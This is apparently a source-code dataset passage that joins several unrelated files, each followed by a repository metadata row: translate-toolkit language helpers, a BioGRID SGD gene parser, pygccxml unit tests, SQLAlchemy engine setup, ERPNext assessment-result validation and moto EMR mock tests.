'hi': ['one', 'other'],
'hr': ['one', 'few', 'other'],
'hsb': ['one', 'two', 'few', 'other'],
'hu': ['one', 'other'],
'hy': ['one', 'other'],
'id': ['other'],
'ig': ['other'],
'ii': ['other'],
'in': ['other'],
'io': ['one', 'other'],
'is': ['one', 'other'],
'it': ['one', 'other'],
'iu': ['one', 'two', 'other'],
'iw': ['one', 'two', 'many', 'other'],
'ja': ['other'],
'jbo': ['other'],
'jgo': ['one', 'other'],
'ji': ['one', 'other'],
'jmc': ['one', 'other'],
'jv': ['other'],
'jw': ['other'],
'ka': ['one', 'other'],
'kab': ['one', 'other'],
'kaj': ['one', 'other'],
'kcg': ['one', 'other'],
'kde': ['other'],
'kea': ['other'],
'kk': ['one', 'other'],
'kkj': ['one', 'other'],
'kl': ['one', 'other'],
'km': ['other'],
'kn': ['one', 'other'],
'ko': ['other'],
'ks': ['one', 'other'],
'ksb': ['one', 'other'],
'ksh': ['zero', 'one', 'other'],
'ku': ['one', 'other'],
'kw': ['one', 'two', 'other'],
'ky': ['one', 'other'],
'lag': ['zero', 'one', 'other'],
'lb': ['one', 'other'],
'lg': ['one', 'other'],
'lkt': ['other'],
'ln': ['one', 'other'],
'lo': ['other'],
'lt': ['one', 'few', 'other'],
'lv': ['zero', 'one', 'other'],
'mas': ['one', 'other'],
'mg': ['one', 'other'],
'mgo': ['one', 'other'],
'mk': ['one', 'other'],
'ml': ['one', 'other'],
'mn': ['one', 'other'],
'mo': ['one', 'few', 'other'],
'mr': ['one', 'other'],
'ms': ['other'],
'mt': ['one', 'few', 'many', 'other'],
'my': ['other'],
'nah': ['one', 'other'],
'naq': ['one', 'two', 'other'],
'nb': ['one', 'other'],
'nd': ['one', 'other'],
'ne': ['one', 'other'],
'nl': ['one', 'other'],
'nn': ['one', 'other'],
'nnh': ['one', 'other'],
'no': ['one', 'other'],
'nqo': ['other'],
'nr': ['one', 'other'],
'nso': ['one', 'other'],
'ny': ['one', 'other'],
'nyn': ['one', 'other'],
'om': ['one', 'other'],
'or': ['one', 'other'],
'os': ['one', 'other'],
'pa': ['one', 'other'],
'pap': ['one', 'other'],
'pl': ['one', 'few', 'many'],
'prg': ['zero', 'one', 'other'],
'ps': ['one', 'other'],
'pt': ['one', 'other'],
'pt_PT': ['one', 'other'],
'rm': ['one', 'other'],
'ro': ['one', 'few', 'other'],
'rof': ['one', 'other'],
'root': ['other'],
'ru': ['one', 'few', 'many'],
'rwk': ['one', 'other'],
'sah': ['other'],
'saq': ['one', 'other'],
'sd': ['one', 'other'],
'sdh': ['one', 'other'],
'se': ['one', 'two', 'other'],
'seh': ['one', 'other'],
'ses': ['other'],
'sg': ['other'],
'sh': ['one', 'few', 'other'],
'shi': ['one', 'few', 'other'],
'si': ['one', 'other'],
'sk': ['one', 'few', 'other'],
'sl': ['one', 'two', 'few', 'other'],
'sma': ['one', 'two', 'other'],
'smi': ['one', 'two', 'other'],
'smj': ['one', 'two', 'other'],
'smn': ['one', 'two', 'other'],
'sms': ['one', 'two', 'other'],
'sn': ['one', 'other'],
'so': ['one', 'other'],
'sq': ['one', 'other'],
'sr': ['one', 'few', 'other'],
'ss': ['one', 'other'],
'ssy': ['one', 'other'],
'st': ['one', 'other'],
'sv': ['one', 'other'],
'sw': ['one', 'other'],
'syr': ['one', 'other'],
'ta': ['one', 'other'],
'te': ['one', 'other'],
'teo': ['one', 'other'],
'th': ['other'],
'ti': ['one', 'other'],
'tig': ['one', 'other'],
'tk': ['one', 'other'],
'tl': ['one', 'other'],
'tn': ['one', 'other'],
'to': ['other'],
'tr': ['one', 'other'],
'ts': ['one', 'other'],
'tzm': ['one', 'other'],
'ug': ['one', 'other'],
'uk': ['one', 'few', 'many'],
'ur': ['one', 'other'],
'uz': ['one', 'other'],
've': ['one', 'other'],
'vi': ['other'],
'vo': ['one', 'other'],
'vun': ['one', 'other'],
'wa': ['one', 'other'],
'wae': ['one', 'other'],
'wo': ['other'],
'xh': ['one', 'other'],
'xog': ['one', 'other'],
'yi': ['one', 'other'],
'yo': ['other'],
'yue': ['other'],
'zh': ['other'],
'zu': ['one', 'other']
}
def simplercode(code):
"""This attempts to simplify the given language code by ignoring country
codes, for example.
.. seealso::
- http://www.rfc-editor.org/rfc/bcp/bcp47.txt
- http://www.rfc-editor.org/rfc/rfc4646.txt
- http://www.rfc-editor.org/rfc/rfc4647.txt
- http://www.w3.org/International/articles/language-tags/
"""
if not code:
return code
separator = normalize_code(code).rfind('-')
if separator >= 0:
return code[:separator]
else:
return ""
expansion_factors = {
'af': 0.1,
'ar': -0.09,
'es': 0.21,
'fr': 0.28,
'it': 0.2,
}
"""Source to target string length expansion factors."""
langcode_re = re.compile("^[a-z]{2,3}([_-][A-Z]{2,3}|)(@[a-zA-Z0-9]+|)$")
langcode_ire = re.compile("^[a-z]{2,3}([_-][a-z]{2,3})?(@[a-z0-9]+)?$",
re.IGNORECASE)
variant_re = re.compile("^[_-][A-Z]{2,3}(@[a-zA-Z0-9]+|)$")
def languagematch(languagecode, otherlanguagecode):
"""matches a languagecode to another, ignoring regions in the second"""
if languagecode is None:
return langcode_re.match(otherlanguagecode)
return (languagecode == otherlanguagecode or
(otherlanguagecode.startswith(languagecode) and
variant_re.match(otherlanguagecode[len(languagecode):])))
def get_country_iso_name(country_code):
"""Return country ISO name."""
country_code = country_code.upper()
try:
if len(country_code) == 2:
country = pycountry.countries.get(alpha_2=country_code)
else:
country = pycountry.countries.get(alpha_3=country_code)
if hasattr(country, 'common_name'):
return country.common_name
return country.name
except (KeyError, AttributeError):
return u""
def get_language_iso_name(language_code):
"""Return language ISO name."""
try:
if len(language_code) == 2:
language = pycountry.languages.get(alpha_2=language_code)
else:
language = pycountry.languages.get(alpha_3=language_code)
if hasattr(language, 'common_name'):
return language.common_name
return language.name
except (KeyError, AttributeError):
return u""
def get_language_iso_fullname(language_code):
"""Return language ISO fullname.
If language code is not a simple ISO 639 code, then we try to split into a
two part language code (ISO 639 and ISO 3166).
"""
if len(language_code) > 3:
language_code = language_code.replace("_", "-").replace("@", "-")
language_code = "-".join(language_code.split("-")[:2])
if "-" not in language_code:
return u""
language_code, country_code = language_code.split("-")
language_name = get_language_iso_name(language_code)
if not language_name:
return u""
country_name = get_country_iso_name(country_code)
if not country_name:
return u""
return u"%s (%s)" % (language_name, country_name)
return get_language_iso_name(language_code)
dialect_name_re = re.compile(r"(.+)\s\(([^)\d]{,25})\)$")
# The limit of 25 characters on the country name is so that "Interlingua (...)"
# (see above) is correctly interpreted.
def tr_lang(langcode=None):
"""Gives a function that can translate a language name, even in the form
``"language (country)"``, into the language with iso code langcode, or the
system language if no language is specified.
"""
langfunc = gettext_lang(langcode)
countryfunc = gettext_country(langcode)
def handlelanguage(name):
match = dialect_name_re.match(name)
if match:
language, country = match.groups()
if country != "macrolanguage":
return (
u"%s (%s)"
% (_fix_language_name(langfunc(language)),
countryfunc(country)))
return _fix_language_name(langfunc(name))
return handlelanguage
def _fix_language_name(name):
"""Identify and replace some unsightly names present in iso-codes.
If the name is present in _fixed_names we assume it is untranslated and we
replace it with a more usable rendering. If the remaining part is long and
includes a semi-colon, we only take the text up to the semi-colon to keep
things neat.
"""
if name in _fixed_names:
return _fixed_names[name]
elif len(name) > 11:
# These constants are somewhat arbitrary, but testing with the Japanese
# translation of ISO codes suggests these as the upper bounds.
split_point = name[5:].find(';')
if split_point >= 0:
return name[:5+split_point]
return name
def gettext_domain(langcode, domain, localedir=None):
"""Returns a gettext function for given iso domain"""
kwargs = dict(
domain=domain,
localedir=localedir,
fallback=True)
if langcode:
kwargs['languages'] = [langcode]
elif os.name == "nt":
# On Windows the default locale is not used for some reason
kwargs['languages'] = [locale.getdefaultlocale()[0]]
t = gettext.translation(**kwargs)
return t.ugettext if six.PY2 else t.gettext
def gettext_lang(langcode=None):
"""Returns a gettext function to translate language names into the given
language, or the system language if no language is specified.
"""
if pycountry is None:
return gettext_domain(langcode, 'iso_639')
return gettext_domain(langcode, 'iso639-3', pycountry.LOCALES_DIR)
def gettext_country(langcode=None):
"""Returns a gettext function to translate country names into the given
language, or the system language if no language is specified.
"""
if pycountry is None:
return gettext_domain(langcode, 'iso_3166')
return gettext_domain(langcode, 'iso3166', pycountry.LOCALES_DIR)
def normalize(string, normal_form="NFC"):
"""Return a unicode string in its normalized form
:param string: The string to be normalized
:param normal_form: NFC (default), NFD, NFKC, NFKD
:return: Normalized string
"""
if string is None:
return None
else:
import unicodedata
return unicodedata.normalize(normal_form, string)
def forceunicode(string):
"""Ensures that the string is in unicode.
:param string: A text string
:type string: Unicode, String
:return: String converted to Unicode and normalized as needed.
:rtype: Unicode
"""
if string is None:
return None
from translate.storage.placeables import StringElem
if isinstance(string, bytes):
encoding = getattr(string, "encoding", "utf-8")
string = string.decode(encoding)
elif isinstance(string, StringElem):
string = six.text_type(string)
return string
def normalized_unicode(string):
"""Forces the string to unicode and does normalization."""
return normalize(forceunicode(string))
def normalize_code(code):
if not code:
return code
return code.replace("_", "-").replace("@", "-").lower()
__normalised_languages = set(normalize_code(key) for key in languages.keys())
def simplify_to_common(language_code, languages=languages):
"""Simplify language code to the most commonly used form for the language,
stripping country information for languages that tend not to be localized
differently for different countries
"""
simpler = simplercode(language_code)
if simpler == "":
return language_code
if (normalize_code(language_code) in __normalised_languages):
return language_code
return simplify_to_common(simpler)
def get_language(code):
code = code.replace("-", "_").replace("@", "_").lower()
if "_" in code:
# convert ab_cd → ab_CD
code = "%s_%s" % (code.split("_")[0], code.split("_", 1)[1].upper())
return languages.get(code, None)
| gpl-2.0 | 7,579,215,694,755,113,000 | 34.118622 | 114 | 0.502706 | false |
starkfree/BioGRID-Annotation | SGD_parseGenes.py | 2 | 2124 |
# Parse annotation from SGD and use it to
# supplement the data already in place from
# entrez gene.
import Config
import sys, string
import MySQLdb
import Database
import gzip
from classes import ModelOrganisms
with Database.db as cursor :
sgd = ModelOrganisms.ModelOrganisms( Database.db, cursor )
sgdIDHash = sgd.buildSGDIDHash( )
with open( Config.SGD_FEATURES, 'r' ) as file :
for line in file.readlines( ) :
line = line.strip( )
splitLine = line.split( "\t" )
sgdID = splitLine[0].strip( )
sgdType = splitLine[1].strip( )
orfName = splitLine[3].strip( )
#if "LTR_RETROTRANSPOSON" == sgdType.upper( ) :
#print splitLine
geneID = "none"
if sgdID not in sgdIDHash :
if "LTR_RETROTRANSPOSON" == sgdType.upper( ) :
cursor.execute( "INSERT INTO " + Config.DB_NAME + ".genes VALUES( '0', %s, 'ordered locus', %s, 'retrotransposon', '559292', 'active', NOW( ), NOW( ), 'SGD', '0' )", [orfName, sgdID] )
Database.db.commit( )
geneID = str(cursor.lastrowid)
cursor.execute( "INSERT INTO " + Config.DB_NAME + ".gene_externals VALUES ('0',%s,'SGD','active',NOW( ), %s)", [sgdID,geneID] )
Database.db.commit( )
else :
# Process Addon Annotation
geneID = sgdIDHash[sgdID]
if geneID != "none" :
if "LTR_RETROTRANSPOSON" == sgdType.upper( ) :
cursor.execute( "UPDATE " + Config.DB_NAME + ".genes SET gene_updated = NOW( ) WHERE gene_id=%s", [geneID] )
Database.db.commit( )
officialSymbol = splitLine[4].strip( )
aliases = (splitLine[5].strip( )).split( "|" )
additionalSGDIDs = (splitLine[7].strip( )).split( "|" )
definition = splitLine[15].strip( )
sgd.processName( geneID, orfName, officialSymbol, "sgd-official", aliases )
sgd.processAddonSGDIDs( geneID, additionalSGDIDs )
sgd.processDefinition( geneID, definition, "SGD-DESCRIPTION" )
cursor.execute( "INSERT INTO " + Config.DB_STATS + ".update_tracker VALUES ( '0', 'SGD_parseGenes', NOW( ) )" )
Database.db.commit( )
sys.exit( )
| mit | -3,803,289,801,295,157,000 | 30.707692 | 189 | 0.618644 | false |
avaitla/Haskell-to-C---Bridge | pygccxml-1.0.0/unittests/namespace_matcher_tester.py | 1 | 2315 | # Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import unittest
import autoconfig
import parser_test_case
from pygccxml import utils
from pygccxml import parser
from pygccxml import declarations
class tester_t( parser_test_case.parser_test_case_t ):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args ):
parser_test_case.parser_test_case_t.__init__( self, *args )
self.header = 'bit_fields.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse( [self.header], self.config )
def test( self ):
criteria = declarations.namespace_matcher_t( name='bit_fields' )
x = declarations.matcher.get_single( criteria, self.declarations )
self.failUnless( str(criteria) == '(decl type==namespace_t) and (name==bit_fields)' )
def test_allow_empty( self ):
global_ns = declarations.get_global_namespace( self.declarations )
global_ns.init_optimizer()
self.failUnless( 0 == len( global_ns.namespaces( 'does not exist', allow_empty=True ) ) )
class unnamed_ns_tester_t( parser_test_case.parser_test_case_t ):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args ):
parser_test_case.parser_test_case_t.__init__( self, *args )
self.header = 'unnamed_ns_bug.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse( [self.header], self.config )
def test( self ):
declarations.matcher.get_single(
declarations.namespace_matcher_t( name='::' )
, self.declarations )
def create_suite():
suite = unittest.TestSuite()
suite.addTest( unittest.makeSuite(tester_t))
suite.addTest( unittest.makeSuite(unnamed_ns_tester_t))
return suite
def run_suite():
unittest.TextTestRunner(verbosity=2).run( create_suite() )
if __name__ == "__main__":
run_suite() | bsd-3-clause | -21,918,521,984,624,264 | 35.983607 | 97 | 0.619438 | false |
karthik339/Agni | MainDemo/flask/lib/python2.7/site-packages/sqlalchemy/engine/__init__.py | 18 | 16353 | # engine/__init__.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""SQL connections, SQL execution and high-level DB-API interface.
The engine package defines the basic components used to interface
DB-API modules with higher-level statement construction,
connection-management, execution and result contexts. The primary
"entry point" class into this package is the Engine and it's public
constructor ``create_engine()``.
This package includes:
base.py
Defines interface classes and some implementation classes which
comprise the basic components used to interface between a DB-API,
constructed and plain-text statements, connections, transactions,
and results.
default.py
Contains default implementations of some of the components defined
in base.py. All current database dialects use the classes in
default.py as base classes for their own database-specific
implementations.
strategies.py
The mechanics of constructing ``Engine`` objects are represented
here. Defines the ``EngineStrategy`` class which represents how
to go from arguments specified to the ``create_engine()``
function, to a fully constructed ``Engine``, including
initialization of connection pooling, dialects, and specific
subclasses of ``Engine``.
threadlocal.py
The ``TLEngine`` class is defined here, which is a subclass of
the generic ``Engine`` and tracks ``Connection`` and
``Transaction`` objects against the identity of the current
thread. This allows certain programming patterns based around
the concept of a "thread-local connection" to be possible.
The ``TLEngine`` is created by using the "threadlocal" engine
strategy in conjunction with the ``create_engine()`` function.
url.py
Defines the ``URL`` class which represents the individual
components of a string URL passed to ``create_engine()``. Also
defines a basic module-loading strategy for the dialect specifier
within a URL.
"""
# not sure what this was used for
#import sqlalchemy.databases
from sqlalchemy.engine.base import (
BufferedColumnResultProxy,
BufferedColumnRow,
BufferedRowResultProxy,
Compiled,
Connectable,
Connection,
Dialect,
Engine,
ExecutionContext,
NestedTransaction,
ResultProxy,
RootTransaction,
RowProxy,
Transaction,
TwoPhaseTransaction,
TypeCompiler
)
from sqlalchemy.engine import strategies
from sqlalchemy import util
__all__ = (
'BufferedColumnResultProxy',
'BufferedColumnRow',
'BufferedRowResultProxy',
'Compiled',
'Connectable',
'Connection',
'Dialect',
'Engine',
'ExecutionContext',
'NestedTransaction',
'ResultProxy',
'RootTransaction',
'RowProxy',
'Transaction',
'TwoPhaseTransaction',
'TypeCompiler',
'create_engine',
'engine_from_config',
)
default_strategy = 'plain'
def create_engine(*args, **kwargs):
"""Create a new :class:`.Engine` instance.
The standard calling form is to send the URL as the
first positional argument, usually a string
that indicates database dialect and connection arguments.
Additional keyword arguments may then follow it which
establish various options on the resulting :class:`.Engine`
and its underlying :class:`.Dialect` and :class:`.Pool`
constructs.
The string form of the URL is
``dialect+driver://user:password@host/dbname[?key=value..]``, where
``dialect`` is a database name such as ``mysql``, ``oracle``,
``postgresql``, etc., and ``driver`` the name of a DBAPI, such as
``psycopg2``, ``pyodbc``, ``cx_oracle``, etc. Alternatively,
the URL can be an instance of :class:`~sqlalchemy.engine.url.URL`.
``**kwargs`` takes a wide variety of options which are routed
towards their appropriate components. Arguments may be
specific to the :class:`.Engine`, the underlying :class:`.Dialect`, as well as the
:class:`.Pool`. Specific dialects also accept keyword arguments that
are unique to that dialect. Here, we describe the parameters
that are common to most :func:`.create_engine()` usage.
Once established, the newly resulting :class:`.Engine` will
request a connection from the underlying :class:`.Pool` once
:meth:`.Engine.connect` is called, or a method which depends on it
such as :meth:`.Engine.execute` is invoked. The :class:`.Pool` in turn
will establish the first actual DBAPI connection when this request
is received. The :func:`.create_engine` call itself does **not**
establish any actual DBAPI connections directly.
See also:
:ref:`engines_toplevel`
:ref:`connections_toplevel`
:param assert_unicode: Deprecated. This flag
sets an engine-wide default value for
the ``assert_unicode`` flag on the
:class:`.String` type - see that
type for further details.
:param connect_args: a dictionary of options which will be
passed directly to the DBAPI's ``connect()`` method as
additional keyword arguments. See the example
at :ref:`custom_dbapi_args`.
:param convert_unicode=False: if set to True, sets
the default behavior of ``convert_unicode`` on the
:class:`.String` type to ``True``, regardless
of a setting of ``False`` on an individual
:class:`.String` type, thus causing all :class:`.String`
-based columns
to accommodate Python ``unicode`` objects. This flag
is useful as an engine-wide setting when using a
DBAPI that does not natively support Python
``unicode`` objects and raises an error when
one is received (such as pyodbc with FreeTDS).
See :class:`.String` for further details on
what this flag indicates.
:param creator: a callable which returns a DBAPI connection.
This creation function will be passed to the underlying
connection pool and will be used to create all new database
connections. Usage of this function causes connection
parameters specified in the URL argument to be bypassed.
:param echo=False: if True, the Engine will log all statements
as well as a repr() of their parameter lists to the engines
logger, which defaults to sys.stdout. The ``echo`` attribute of
``Engine`` can be modified at any time to turn logging on and
off. If set to the string ``"debug"``, result rows will be
printed to the standard output as well. This flag ultimately
controls a Python logger; see :ref:`dbengine_logging` for
information on how to configure logging directly.
:param echo_pool=False: if True, the connection pool will log
all checkouts/checkins to the logging stream, which defaults to
sys.stdout. This flag ultimately controls a Python logger; see
:ref:`dbengine_logging` for information on how to configure logging
directly.
:param encoding: Defaults to ``utf-8``. This is the string
encoding used by SQLAlchemy for string encode/decode
operations which occur within SQLAlchemy, **outside of
the DBAPI.** Most modern DBAPIs feature some degree of
direct support for Python ``unicode`` objects,
what you see in Python 2 as a string of the form
``u'some string'``. For those scenarios where the
DBAPI is detected as not supporting a Python ``unicode``
object, this encoding is used to determine the
source/destination encoding. It is **not used**
for those cases where the DBAPI handles unicode
directly.
To properly configure a system to accommodate Python
``unicode`` objects, the DBAPI should be
configured to handle unicode to the greatest
degree as is appropriate - see
the notes on unicode pertaining to the specific
target database in use at :ref:`dialect_toplevel`.
Areas where string encoding may need to be accommodated
outside of the DBAPI include zero or more of:
* the values passed to bound parameters, corresponding to
the :class:`.Unicode` type or the :class:`.String` type
when ``convert_unicode`` is ``True``;
* the values returned in result set columns corresponding
to the :class:`.Unicode` type or the :class:`.String`
type when ``convert_unicode`` is ``True``;
* the string SQL statement passed to the DBAPI's
``cursor.execute()`` method;
* the string names of the keys in the bound parameter
dictionary passed to the DBAPI's ``cursor.execute()``
as well as ``cursor.setinputsizes()`` methods;
* the string column names retrieved from the DBAPI's
``cursor.description`` attribute.
When using Python 3, the DBAPI is required to support
*all* of the above values as Python ``unicode`` objects,
which in Python 3 are just known as ``str``. In Python 2,
the DBAPI does not specify unicode behavior at all,
so SQLAlchemy must make decisions for each of the above
values on a per-DBAPI basis - implementations are
completely inconsistent in their behavior.
:param execution_options: Dictionary execution options which will
be applied to all connections. See
:meth:`~sqlalchemy.engine.base.Connection.execution_options`
:param implicit_returning=True: When ``True``, a RETURNING-
compatible construct, if available, will be used to
fetch newly generated primary key values when a single row
INSERT statement is emitted with no existing returning()
clause. This applies to those backends which support RETURNING
or a compatible construct, including Postgresql, Firebird, Oracle,
Microsoft SQL Server. Set this to ``False`` to disable
the automatic usage of RETURNING.
:param label_length=None: optional integer value which limits
the size of dynamically generated column labels to that many
characters. If less than 6, labels are generated as
"_(counter)". If ``None``, the value of
``dialect.max_identifier_length`` is used instead.
:param listeners: A list of one or more
:class:`~sqlalchemy.interfaces.PoolListener` objects which will
receive connection pool events.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.engine" logger. Defaults to a hexstring of the
object's id.
:param max_overflow=10: the number of connections to allow in
connection pool "overflow", that is connections that can be
opened above and beyond the pool_size setting, which defaults
to five. this is only used with :class:`~sqlalchemy.pool.QueuePool`.
:param module=None: reference to a Python module object (the module itself, not
its string name). Specifies an alternate DBAPI module to be used
by the engine's dialect. Each sub-dialect references a specific DBAPI which
will be imported before first connect. This parameter causes the
import to be bypassed, and the given module to be used instead.
Can be used for testing of DBAPIs as well as to inject "mock"
DBAPI implementations into the :class:`.Engine`.
:param pool=None: an already-constructed instance of
:class:`~sqlalchemy.pool.Pool`, such as a
:class:`~sqlalchemy.pool.QueuePool` instance. If non-None, this
pool will be used directly as the underlying connection pool
for the engine, bypassing whatever connection parameters are
present in the URL argument. For information on constructing
connection pools manually, see :ref:`pooling_toplevel`.
:param poolclass=None: a :class:`~sqlalchemy.pool.Pool`
subclass, which will be used to create a connection pool
instance using the connection parameters given in the URL. Note
this differs from ``pool`` in that you don't actually
instantiate the pool in this case, you just indicate what type
of pool to be used.
:param pool_logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
:param pool_size=5: the number of connections to keep open
inside the connection pool. This used with :class:`~sqlalchemy.pool.QueuePool` as
well as :class:`~sqlalchemy.pool.SingletonThreadPool`. With
:class:`~sqlalchemy.pool.QueuePool`, a ``pool_size`` setting
of 0 indicates no limit; to disable pooling, set ``poolclass`` to
:class:`~sqlalchemy.pool.NullPool` instead.
:param pool_recycle=-1: this setting causes the pool to recycle
connections after the given number of seconds has passed. It
defaults to -1, or no timeout. For example, setting to 3600
means connections will be recycled after one hour. Note that
MySQL in particular will disconnect automatically if no
activity is detected on a connection for eight hours (although
this is configurable with the MySQLDB connection itself and the
server configuration as well).
:param pool_reset_on_return='rollback': set the "reset on return"
behavior of the pool, which is whether ``rollback()``,
``commit()``, or nothing is called upon connections
being returned to the pool. See the docstring for
``reset_on_return`` at :class:`.Pool`.
.. versionadded:: 0.7.6
:param pool_timeout=30: number of seconds to wait before giving
up on getting a connection from the pool. This is only used
with :class:`~sqlalchemy.pool.QueuePool`.
:param strategy='plain': selects alternate engine implementations.
Currently available are:
* the ``threadlocal`` strategy, which is described in
:ref:`threadlocal_strategy`;
* the ``mock`` strategy, which dispatches all statement
execution to a function passed as the argument ``executor``.
See `example in the FAQ <http://www.sqlalchemy.org/trac/wiki/FAQ#HowcanIgettheCREATETABLEDROPTABLEoutputasastring>`_.
:param executor=None: a function taking arguments
``(sql, *multiparams, **params)``, to which the ``mock`` strategy will
dispatch all statement execution. Used only by ``strategy='mock'``.
"""
strategy = kwargs.pop('strategy', default_strategy)
strategy = strategies.strategies[strategy]
return strategy.create(*args, **kwargs)
def engine_from_config(configuration, prefix='sqlalchemy.', **kwargs):
"""Create a new Engine instance using a configuration dictionary.
The dictionary is typically produced from a config file where keys
are prefixed, such as sqlalchemy.url, sqlalchemy.echo, etc. The
'prefix' argument indicates the prefix to be searched for.
A select set of keyword arguments will be "coerced" to their
expected type based on string values. In a future release, this
functionality will be expanded and include dialect-specific
arguments.
"""
opts = _coerce_config(configuration, prefix)
opts.update(kwargs)
url = opts.pop('url')
return create_engine(url, **opts)
def _coerce_config(configuration, prefix):
"""Convert configuration values to expected types."""
options = dict((key[len(prefix):], configuration[key])
for key in configuration
if key.startswith(prefix))
for option, type_ in (
('convert_unicode', util.bool_or_str('force')),
('pool_timeout', int),
('echo', util.bool_or_str('debug')),
('echo_pool', util.bool_or_str('debug')),
('pool_recycle', int),
('pool_size', int),
('max_overflow', int),
('pool_threadlocal', bool),
('use_native_unicode', bool),
):
util.coerce_kw_type(options, option, type_)
return options
| apache-2.0 | 4,041,809,653,253,141,500 | 42.492021 | 127 | 0.687458 | false |
indictranstech/erpnext | erpnext/education/doctype/assessment_result/assessment_result.py | 2 | 1970 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import flt
from frappe.model.document import Document
from erpnext.education.api import get_grade
from erpnext.education.api import get_assessment_details
from frappe.utils.csvutils import getlink
class AssessmentResult(Document):
def validate(self):
if self.student and not self.student_name:
self.student_name = frappe.db.get_value("Student", self.student, "title")
self.grading_scale = frappe.db.get_value("Assessment Plan", self.assessment_plan, "grading_scale")
self.validate_maximum_score()
self.validate_grade()
self.validate_duplicate()
def validate_maximum_score(self):
self.maximum_score = frappe.db.get_value("Assessment Plan", self.assessment_plan, "maximum_assessment_score")
assessment_details = get_assessment_details(self.assessment_plan)
max_scores = {}
for d in assessment_details:
max_scores.update({d.assessment_criteria: d.maximum_score})
for d in self.details:
d.maximum_score = max_scores.get(d.assessment_criteria)
if d.score > d.maximum_score:
frappe.throw(_("Score cannot be greater than Maximum Score"))
def validate_grade(self):
self.total_score = 0.0
for d in self.details:
d.grade = get_grade(self.grading_scale, (flt(d.score)/d.maximum_score)*100)
self.total_score += d.score
self.grade = get_grade(self.grading_scale, (self.total_score/self.maximum_score)*100)
def validate_duplicate(self):
assessment_result = frappe.get_list("Assessment Result", filters={"name": ("not in", [self.name]),
"student":self.student, "assessment_plan":self.assessment_plan, "docstatus":("!=", 2)})
if assessment_result:
frappe.throw(_("Assessment Result record {0} already exists.".format(getlink("Assessment Result",assessment_result[0].name))))
| agpl-3.0 | -1,406,481,047,795,354,600 | 37.627451 | 129 | 0.737563 | false |
okomestudio/moto | tests/test_emr/test_emr.py | 5 | 24251 | from __future__ import unicode_literals
import time
from datetime import datetime
import boto
import pytz
from boto.emr.bootstrap_action import BootstrapAction
from boto.emr.instance_group import InstanceGroup
from boto.emr.step import StreamingStep
import six
import sure # noqa
from moto import mock_emr_deprecated
from tests.helpers import requires_boto_gte
run_jobflow_args = dict(
job_flow_role='EMR_EC2_DefaultRole',
keep_alive=True,
log_uri='s3://some_bucket/jobflow_logs',
master_instance_type='c1.medium',
name='My jobflow',
num_instances=2,
service_role='EMR_DefaultRole',
slave_instance_type='c1.medium',
)
input_instance_groups = [
InstanceGroup(1, 'MASTER', 'c1.medium', 'ON_DEMAND', 'master'),
InstanceGroup(3, 'CORE', 'c1.medium', 'ON_DEMAND', 'core'),
InstanceGroup(6, 'TASK', 'c1.large', 'SPOT', 'task-1', '0.07'),
InstanceGroup(10, 'TASK', 'c1.xlarge', 'SPOT', 'task-2', '0.05'),
]
@mock_emr_deprecated
def test_describe_cluster():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
args.update(dict(
api_params={
'Applications.member.1.Name': 'Spark',
'Applications.member.1.Version': '2.4.2',
'Configurations.member.1.Classification': 'yarn-site',
'Configurations.member.1.Properties.entry.1.key': 'someproperty',
'Configurations.member.1.Properties.entry.1.value': 'somevalue',
'Configurations.member.1.Properties.entry.2.key': 'someotherproperty',
'Configurations.member.1.Properties.entry.2.value': 'someothervalue',
'Instances.EmrManagedMasterSecurityGroup': 'master-security-group',
'Instances.Ec2SubnetId': 'subnet-8be41cec',
},
availability_zone='us-east-2b',
ec2_keyname='mykey',
job_flow_role='EMR_EC2_DefaultRole',
keep_alive=False,
log_uri='s3://some_bucket/jobflow_logs',
name='My jobflow',
service_role='EMR_DefaultRole',
visible_to_all_users=True,
))
cluster_id = conn.run_jobflow(**args)
input_tags = {'tag1': 'val1', 'tag2': 'val2'}
conn.add_tags(cluster_id, input_tags)
cluster = conn.describe_cluster(cluster_id)
cluster.applications[0].name.should.equal('Spark')
cluster.applications[0].version.should.equal('2.4.2')
cluster.autoterminate.should.equal('true')
# configurations appear not be supplied as attributes?
attrs = cluster.ec2instanceattributes
# AdditionalMasterSecurityGroups
# AdditionalSlaveSecurityGroups
attrs.ec2availabilityzone.should.equal(args['availability_zone'])
attrs.ec2keyname.should.equal(args['ec2_keyname'])
attrs.ec2subnetid.should.equal(args['api_params']['Instances.Ec2SubnetId'])
# EmrManagedMasterSecurityGroups
# EmrManagedSlaveSecurityGroups
attrs.iaminstanceprofile.should.equal(args['job_flow_role'])
# ServiceAccessSecurityGroup
cluster.id.should.equal(cluster_id)
cluster.loguri.should.equal(args['log_uri'])
cluster.masterpublicdnsname.should.be.a(six.string_types)
cluster.name.should.equal(args['name'])
int(cluster.normalizedinstancehours).should.equal(0)
# cluster.release_label
cluster.shouldnt.have.property('requestedamiversion')
cluster.runningamiversion.should.equal('1.0.0')
# cluster.securityconfiguration
cluster.servicerole.should.equal(args['service_role'])
cluster.status.state.should.equal('TERMINATED')
cluster.status.statechangereason.message.should.be.a(six.string_types)
cluster.status.statechangereason.code.should.be.a(six.string_types)
cluster.status.timeline.creationdatetime.should.be.a(six.string_types)
# cluster.status.timeline.enddatetime.should.be.a(six.string_types)
# cluster.status.timeline.readydatetime.should.be.a(six.string_types)
dict((item.key, item.value)
for item in cluster.tags).should.equal(input_tags)
cluster.terminationprotected.should.equal('false')
cluster.visibletoallusers.should.equal('true')
@mock_emr_deprecated
def test_describe_jobflows():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
expected = {}
